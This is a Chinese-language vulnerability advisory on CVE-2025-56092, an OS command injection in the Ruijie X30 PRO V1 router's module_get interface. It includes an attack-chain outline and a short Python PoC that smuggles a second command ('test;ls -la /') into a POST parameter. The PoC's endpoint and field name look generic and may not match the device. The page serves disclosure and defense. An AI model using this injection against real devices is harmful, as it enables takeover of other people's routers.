CVE-2025-56092 CVSS 8.8 高危

CVE-2025-56092 锐捷X30 PRO V1 操作系统命令注入漏洞

披露日期: 2025-12-11

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-56092

漏洞类型

操作系统命令注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Ruijie X30 PRO V1 (X30-PRO-V1_09241521)

漏洞概述

CVE-2025-56092是锐捷网络X30 PRO V1路由器中存在的一个高危操作系统命令注入漏洞。该漏洞存在于固件版本X30-PRO-V1_09241521中，攻击者可以通过向设备发送精心构造的POST请求，在file /usr/local/lua/dev_sta/networkConnect.lua的module_get接口处注入任意操作系统命令。由于该漏洞的CVSS评分高达8.8，属于高危级别，且攻击复杂度低、无需高权限即可利用，对受影响设备的安全性构成严重威胁。攻击成功后可完全控制路由器设备，窃取网络流量、植入后门或进行进一步的内网渗透。

技术细节

该漏洞属于经典的操作系统命令注入（OS Command Injection）类型。漏洞点位于/usr/local/lua/dev_sta/networkConnect.lua文件中的module_get函数。攻击者通过POST请求向该接口发送包含恶意命令参数的请求，由于该接口对用户输入未进行充分的输入验证和命令隔离，直接将用户可控的参数拼接到系统命令中执行。攻击者可以利用分号、管道符等命令连接符注入额外的系统命令，如反弹shell、下载恶意程序等操作。由于该接口位于网络服务中且认证要求为低权限，攻击者可在无需高权限的情况下远程利用此漏洞，实现对设备的完全控制。

攻击链分析

STEP 1

步骤1

攻击者识别目标设备为锐捷X30 PRO V1路由器，确认固件版本为X30-PRO-V1_09241521

STEP 2

步骤2

攻击者构造包含恶意命令的POST请求，针对/usr/local/lua/dev_sta/networkConnect.lua的module_get接口

STEP 3

步骤3

利用命令连接符（如分号、管道符）在参数中注入操作系统命令

STEP 4

步骤4

目标设备执行注入的命令，攻击者获得命令执行权限

STEP 5

步骤5

攻击者可进一步反弹shell、植入后门或窃取网络数据，实现对设备的完全控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

target = 'http://target-ip:80'

# OS Command Injection PoC for CVE-2025-56092
# Target: Ruijie X30 PRO V1 (X30-PRO-V1_09241521)
# Endpoint: /usr/local/lua/dev_sta/networkConnect.lua (module_get)

payload = 'test;ls -la /'  # Example command injection

data = {
    'param': payload
}

try:
    response = requests.post(
        f'{target}/cgi-bin/luci/api/network/module_get',
        data=data,
        timeout=10
    )
    print(f'Status Code: {response.status_code}')
    print(f'Response: {response.text}')
except Exception as e:
    print(f'Error: {e}')

影响范围

Ruijie X30 PRO V1 (X30-PRO-V1_09241521)

防御指南

临时缓解措施

在厂商发布修复补丁之前，建议将设备管理界面限制在可信网络范围内访问，禁用公网IP的Web管理界面，并持续监控设备日志以发现异常行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表